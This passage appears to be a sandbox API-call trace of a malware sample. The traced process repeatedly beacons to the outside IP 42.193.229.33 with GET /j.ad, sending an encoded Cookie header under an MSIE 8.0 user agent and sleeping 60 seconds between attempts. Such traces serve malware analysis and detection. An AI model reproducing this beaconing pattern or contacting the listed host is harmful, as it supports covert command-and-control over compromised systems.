FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0213.160] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0213.160] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0213.160] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0213.160] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0213.160] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0213.160] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0213.160] Sleep (dwMilliseconds=0xea60) [0213.166] GetLastError () returned 0x2efd [0213.166] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0213.167] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0213.167] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0213.167] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0213.167] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0213.167] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0213.167] GetLastError () returned 0x0 [0213.167] htonl (hostlong=0x7000000) returned 0x7 [0213.167] htonl (hostlong=0x0) returned 0x0 [0213.167] htonl (hostlong=0x3000000) returned 0x3 [0213.167] htonl (hostlong=0x6000000) returned 0x6 [0213.167] htonl (hostlong=0x6000000) returned 0x6 [0213.167] GetLastError () returned 0x0 [0213.167] htonl (hostlong=0x0) returned 0x0 [0213.168] GetLastError () returned 0x0 [0213.168] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0213.168] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0215.153] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0215.153] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0215.153] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0215.153] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0215.153] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0215.153] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0215.153] Sleep (dwMilliseconds=0xea60) [0215.164] GetLastError () returned 0x2efd [0215.165] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0215.165] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0215.165] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0215.165] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0215.165] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0215.165] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0215.165] GetLastError () returned 0x0 [0215.165] htonl (hostlong=0x7000000) returned 0x7 [0215.165] htonl (hostlong=0x0) returned 0x0 [0215.165] htonl (hostlong=0x3000000) returned 0x3 [0215.165] htonl (hostlong=0x6000000) returned 0x6 [0215.165] htonl (hostlong=0x6000000) returned 0x6 [0215.165] GetLastError () returned 0x0 [0215.165] htonl (hostlong=0x0) returned 0x0 [0215.165] GetLastError () returned 0x0 [0215.165] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0215.165] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0217.142] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0217.142] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0217.142] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0217.142] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0217.142] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0217.142] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0217.143] Sleep (dwMilliseconds=0xea60) [0217.143] GetLastError () returned 0x2efd [0217.143] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0217.143] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0217.143] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0217.144] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0217.144] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0217.144] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0217.144] GetLastError () returned 0x0 [0217.144] htonl (hostlong=0x7000000) returned 0x7 [0217.144] htonl (hostlong=0x0) returned 0x0 [0217.144] htonl (hostlong=0x3000000) returned 0x3 [0217.144] htonl (hostlong=0x6000000) returned 0x6 [0217.144] htonl (hostlong=0x6000000) returned 0x6 [0217.144] GetLastError () returned 0x0 [0217.144] htonl (hostlong=0x0) returned 0x0 [0217.145] GetLastError () returned 0x0 [0217.145] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0217.145] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0219.145] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0219.145] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0219.145] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0219.145] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0219.145] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0219.145] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0219.145] Sleep (dwMilliseconds=0xea60) [0219.155] GetLastError () returned 0x2efd [0219.156] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0219.163] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0219.163] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0219.163] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0219.163] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0219.163] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0219.163] GetLastError () returned 0x0 [0219.164] htonl (hostlong=0x7000000) returned 0x7 [0219.164] htonl (hostlong=0x0) returned 0x0 [0219.164] htonl (hostlong=0x3000000) returned 0x3 [0219.164] htonl (hostlong=0x6000000) returned 0x6 [0219.164] htonl (hostlong=0x6000000) returned 0x6 [0219.164] GetLastError () returned 0x0 [0219.164] htonl (hostlong=0x0) returned 0x0 [0219.164] GetLastError () returned 0x0 [0219.164] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0219.164] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0221.134] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0221.134] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0221.134] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0221.135] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0221.137] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0221.137] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0221.138] Sleep (dwMilliseconds=0xea60) [0221.154] GetLastError () returned 0x2efd [0221.154] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0221.154] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0221.154] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0221.154] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0221.155] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0221.155] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0221.155] GetLastError () returned 0x0 [0221.156] htonl (hostlong=0x7000000) returned 0x7 [0221.156] htonl (hostlong=0x0) returned 0x0 [0221.158] htonl (hostlong=0x3000000) returned 0x3 [0221.158] htonl (hostlong=0x6000000) returned 0x6 [0221.158] htonl (hostlong=0x6000000) returned 0x6 [0221.158] GetLastError () returned 0x0 [0221.160] htonl (hostlong=0x0) returned 0x0 [0221.160] GetLastError () returned 0x0 [0221.160] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0221.160] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0223.151] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0223.152] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0223.152] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0223.152] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0223.152] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0223.152] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0223.152] Sleep (dwMilliseconds=0xea60) [0223.173] GetLastError () returned 0x2efd [0223.174] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0223.174] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0223.174] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0223.174] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0223.174] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0223.174] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0223.174] GetLastError () returned 0x0 [0223.176] htonl (hostlong=0x7000000) returned 0x7 [0223.176] htonl (hostlong=0x0) returned 0x0 [0223.176] htonl (hostlong=0x3000000) returned 0x3 [0223.176] htonl (hostlong=0x6000000) returned 0x6 [0223.176] htonl (hostlong=0x6000000) returned 0x6 [0223.176] GetLastError () returned 0x0 [0223.176] htonl (hostlong=0x0) returned 0x0 [0223.177] GetLastError () returned 0x0 [0223.177] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0223.177] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0225.184] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0225.184] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0225.184] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0225.184] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0225.184] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0225.184] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0225.184] Sleep (dwMilliseconds=0xea60) [0225.193] GetLastError () returned 0x2efd [0225.195] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0225.196] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0225.196] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0225.196] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0225.196] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0225.196] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0225.196] GetLastError () returned 0x0 [0225.196] htonl (hostlong=0x7000000) returned 0x7 [0225.196] htonl (hostlong=0x0) returned 0x0 [0225.196] htonl (hostlong=0x3000000) returned 0x3 [0225.196] htonl (hostlong=0x6000000) returned 0x6 [0225.197] htonl (hostlong=0x6000000) returned 0x6 [0225.197] GetLastError () returned 0x0 [0225.197] htonl (hostlong=0x0) returned 0x0 [0225.197] GetLastError () returned 0x0 [0225.197] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0225.197] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0227.158] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0227.159] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0227.159] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0227.159] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0227.159] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0227.159] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0227.159] Sleep (dwMilliseconds=0xea60) [0227.174] GetLastError () returned 0x2efd [0227.174] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0227.174] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0227.174] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0227.174] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0227.174] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0227.174] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0227.174] GetLastError () returned 0x0 [0227.175] htonl (hostlong=0x7000000) returned 0x7 [0227.175] htonl (hostlong=0x0) returned 0x0 [0227.175] htonl (hostlong=0x3000000) returned 0x3 [0227.175] htonl (hostlong=0x6000000) returned 0x6 [0227.175] htonl (hostlong=0x6000000) returned 0x6 [0227.175] GetLastError () returned 0x0 [0227.175] htonl (hostlong=0x0) returned 0x0 [0227.175] GetLastError () returned 0x0 [0227.175] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0227.175] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0229.128] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0229.128] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0229.128] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0229.128] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0229.128] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0229.128] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0229.128] Sleep (dwMilliseconds=0xea60) [0229.144] GetLastError () returned 0x2efd [0229.144] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0229.145] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0229.145] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0229.145] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0229.145] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0229.145] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0229.145] GetLastError () returned 0x0 [0229.145] htonl (hostlong=0x7000000) returned 0x7 [0229.145] htonl (hostlong=0x0) returned 0x0 [0229.145] htonl (hostlong=0x3000000) returned 0x3 [0229.145] htonl (hostlong=0x6000000) returned 0x6 [0229.145] htonl (hostlong=0x6000000) returned 0x6 [0229.145] GetLastError () returned 0x0 [0229.145] htonl (hostlong=0x0) returned 0x0 [0229.145] GetLastError () returned 0x0 [0229.146] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0229.146] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0231.139] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0231.139] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0231.139] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0231.139] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0231.139] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0231.139] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0231.140] Sleep (dwMilliseconds=0xea60) [0231.159] GetLastError () returned 0x2efd [0231.159] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0231.160] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0231.160] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0231.160] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0231.160] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0231.160] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0231.160] GetLastError () returned 0x0 [0231.160] htonl (hostlong=0x7000000) returned 0x7 [0231.160] htonl (hostlong=0x0) returned 0x0 [0231.160] htonl (hostlong=0x3000000) returned 0x3 [0231.160] htonl (hostlong=0x6000000) returned 0x6 [0231.160] htonl (hostlong=0x6000000) returned 0x6 [0231.160] GetLastError () returned 0x0 [0231.160] htonl (hostlong=0x0) returned 0x0 [0231.160] GetLastError () returned 0x0 